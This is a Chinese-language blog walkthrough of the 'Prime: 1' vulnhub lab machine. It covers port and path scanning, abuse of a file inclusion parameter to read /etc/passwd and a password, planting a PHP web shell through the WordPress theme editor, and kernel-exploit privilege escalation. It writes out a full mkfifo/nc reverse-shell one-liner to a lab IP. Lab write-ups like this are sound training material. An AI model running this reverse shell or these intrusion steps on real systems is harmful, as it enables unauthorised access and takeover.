WEB

WEB安全

漏洞复现

CTF

常用工具

实战

代码审计

后渗透

内网渗透

免杀

进程注入

权限提升

漏洞复现

靶机

vulnstack

vulnhub

Root-Me

编程语言

java

逆向

PE

逆向学习

HEVD

其它

关于博客

面试

杂谈

Prime: 1

0x01 信息收集

nmap探测一下端口

开放了22和80

就放了一张图,看了页面源代码也没有提示,还是扫一扫路径吧

index.php就是首页,index.php/login也是首页,/dev打开是一个提示

和我说我在第0关..真实渗透测试很难什么的..整成这样我还以为是隐写,binwalk和foremost都用了一下也没找到图片里面藏了什么,然而我的隐写水平就这么一点,所以换个大字典继续扫目录

这里仔细看可以发现index.php后面的参数不一样返回的长度不一样,可以判断这里是有file这个参数的,并且返回了一下东西

还扫出了这些,总结一下现在扫出的文件有

index.php image.php secret.txt /dev /wordpress,一个个看过去

image.php和index.php一样也是一张图片,secret.txt是一个提示

下面提示有一个location.txt文件,直接访问发现访问不到,顺便看了一下github

看到这个好像是想提示fuzz参数,说实话我除了爆破木马的时候会fuzz参数别的时候都没用过..

现在想起字典里面那个不一样的长度,估计有一个参数就是file,再去看看加了参数的index.php

路径改了几次之后都是这样的,想到前面有个location.txt,放到参数后面试一试

有新的提示了,说是可以进行下一步挖掘,使用secrettier360这个参数在别的php页面上获得乐趣

别的php页面的话,应该就是之前扫到的image.php

在这个页面用参数读到了/etc/passwd

后面有提示去这个用户的家目录下找password.txt

下面这个应该是密码,记一下follow_the_ippsec,尝试访问一下别的文件也没有

之前nmap扫到22端口是开着的,用这个密码连接试试

然而还是连接不上..

话说前面还扫出一个wordpress的,去看看

就啥都没,一个全新的wordpress,用wpscan扫扫看

然而也没有什么东西

去后台看一下,可能后台可以用到刚刚得到的密码,去后台登录一下试试

使用saket/follow_the_ippsec登录失败,想到前面在/etc/passwd里面还有几个用户,拿那些名字过来试试,emmm看了一下其实就只有一个victor了,别的都是不可登录的,那就用这个再尝试一下

登陆成功

0x02 getshell

wordpress后台getshell我知道的不多,先看看有没有上传点,有上传点但是上传目录不可写..本来还想用前面那个文件包含的..只能再看看

看到插件这里可以编辑php代码

查了下插件的路径是url+/wp-content/plugins/

修改一下这里的php代码,然后..然后保存不了???

只能再翻翻,终于在Appearance->Theme Editor下找到了一个secret.php可写,前面我还以为是浏览器的问题,还换了浏览器..

写进去保存一下就好了,然后路径找不到,去网上下了个wordpress找找

/wp-content/themes/twentynineteen/secret.php

蚁剑连接一下

0x03 提权

看了下是ubuntu16.04,内核是4.10,好像也不能使用suid提权,去找找有没有提权的脚本

感觉这个脚本挺符合的,内核还是版本都符合,编译一下试试

那边先反弹一下shell

用bash弹不出来,靶机里面有nc但是没有-e参数,去翻了翻文章‘可以用下面的方法反弹

1
rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 192.168.163.128 60001 >/tmp/f

升级一下shell,把编译好的exp传上去

成功提权之后得到key